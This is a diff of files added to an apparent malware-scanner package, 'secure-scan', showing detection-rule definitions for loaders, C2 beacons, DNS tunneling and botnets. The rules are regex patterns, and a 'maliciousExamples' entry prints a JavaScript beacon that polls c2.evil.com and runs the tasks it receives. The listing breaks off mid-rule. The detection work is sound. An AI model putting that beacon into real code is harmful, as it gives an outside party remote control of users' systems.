secure-scan 1.2.2

package/dist/rules/malware/categories/loaders.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"loaders.js","sourceRoot":"","sources":["../../../../src/rules/malware/categories/loaders.ts"],"names":[],"mappings":"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"}

package/dist/rules/malware/categories/network.d.ts

@@ -0,0 +1,19 @@
+/**
+ * @fileoverview Suspicious Network and C2 Detection Rules
+ * @module rules/malware/categories/network
+ *
+ * Comprehensive rules for detecting suspicious network activity including:
+ * - Command and Control (C2) communication
+ * - DNS tunneling
+ * - Botnet patterns
+ * - Suspicious external connections
+ * - Data exfiltration channels
+ */
+import { MalwareRule } from '../types';
+export declare const c2Rules: MalwareRule[];
+export declare const suspiciousConnectionRules: MalwareRule[];
+export declare const dnsTunnelingRules: MalwareRule[];
+export declare const botnetRules: MalwareRule[];
+export declare const networkRules: MalwareRule[];
+export default networkRules;
+//# sourceMappingURL=network.d.ts.map

package/dist/rules/malware/categories/network.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"network.d.ts","sourceRoot":"","sources":["../../../../src/rules/malware/categories/network.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;GAUG;AAEH,OAAO,EACL,WAAW,EAQZ,MAAM,UAAU,CAAC;AAMlB,eAAO,MAAM,OAAO,EAAE,WAAW,EAoKhC,CAAC;AAMF,eAAO,MAAM,yBAAyB,EAAE,WAAW,EA0QlD,CAAC;AAMF,eAAO,MAAM,iBAAiB,EAAE,WAAW,EAiF1C,CAAC;AAMF,eAAO,MAAM,WAAW,EAAE,WAAW,EAqEpC,CAAC;AAMF,eAAO,MAAM,YAAY,EAAE,WAAW,EAKrC,CAAC;AAEF,eAAe,YAAY,CAAC"}

package/dist/rules/malware/categories/network.js

@@ -0,0 +1,622 @@
+"use strict";
+/**
+ * @fileoverview Suspicious Network and C2 Detection Rules
+ * @module rules/malware/categories/network
+ *
+ * Comprehensive rules for detecting suspicious network activity including:
+ * - Command and Control (C2) communication
+ * - DNS tunneling
+ * - Botnet patterns
+ * - Suspicious external connections
+ * - Data exfiltration channels
+ */
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.networkRules = exports.botnetRules = exports.dnsTunnelingRules = exports.suspiciousConnectionRules = exports.c2Rules = void 0;
+const types_1 = require("../types");
+// ============================================================================
+// C2 COMMUNICATION RULES
+// ============================================================================
+exports.c2Rules = [
+    {
+        id: 'MAL-NET-001',
+        name: 'C2 Communication - Beacon Pattern',
+        description: 'Detects periodic heartbeat/beacon communication with external servers.',
+        version: '2.0.0',
+        threatType: types_1.MalwareThreatType.C2_COMMUNICATION,
+        category: types_1.MalwareCategory.BOTNET,
+        languages: [
+            types_1.SupportedLanguage.JAVASCRIPT,
+            types_1.SupportedLanguage.TYPESCRIPT,
+            types_1.SupportedLanguage.PYTHON
+        ],
+        severity: types_1.MalwareSeverity.CRITICAL,
+        confidence: types_1.ConfidenceLevel.HIGH,
+        baseScore: 88,
+        patterns: [
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'setinterval-http',
+                pattern: 'setInterval\\s*\\([^)]*(?:fetch|axios|XMLHttpRequest|http)[^)]*,\\s*\\d{4,}\\s*\\)',
+                flags: 'gis',
+                weight: 0.9,
+                description: 'Periodic HTTP requests'
+            },
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'python-loop-http',
+                pattern: 'while\\s+True:[\\s\\S]*?(?:requests\\.|urllib|http\\.client)[\\s\\S]*?time\\.sleep\\s*\\(\\s*\\d+',
+                flags: 'gis',
+                weight: 1.0,
+                description: 'Python infinite loop with HTTP and sleep'
+            },
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'heartbeat-function',
+                pattern: 'function\\s+(?:heartbeat|beacon|ping)\\s*\\([^)]*\\)[\\s\\S]*?(?:fetch|http)',
+                flags: 'gis',
+                weight: 0.8,
+                description: 'Heartbeat/beacon function'
+            }
+        ],
+        amplifyingPatterns: [
+            {
+                type: types_1.PatternType.REGEX,
+                patternId: 'command-response',
+                pattern: '(?:cmd|command|task|job)\\s*[:=]',
+                flags: 'gi',
+                weight: 0.4,
+                description: 'Command/task variables'
+            }
+        ],
+        maliciousExamples: [
+            {
+                code: `setInterval(async () => {
+  const response = await fetch('https://c2.evil.com/beacon', {
+    method: 'POST',
+    body: JSON.stringify({ id: botId, status: 'alive' })
+  });
+  const cmd = await response.json();
+  if (cmd.task) executeTask(cmd.task);
+}, 30000);`,
+                language: types_1.SupportedLanguage.JAVASCRIPT,
+                isMalicious: true,
+                description: 'C2 beacon with command execution'
+            }
+        ],
+        impact: {
+            technical: 'Maintains persistent connection to command and control server.',
+            business: 'Allows remote control of compromised system.',
+            affectedAssets: ['Network', 'System control'],
+            dataAtRisk: ['All accessible data', 'System control']
+        },
+        remediation: {
+            summary: 'Block C2 communication and remove malware.',
+            steps: [
+                'Block C2 server IPs/domains at network level',
+                'Remove beacon code',
+                'Analyze command history if available',
+                'Check for additional payloads or persistence',
+                'Reset credentials'
+            ]
+        },
+        mitreAttack: [
+            {
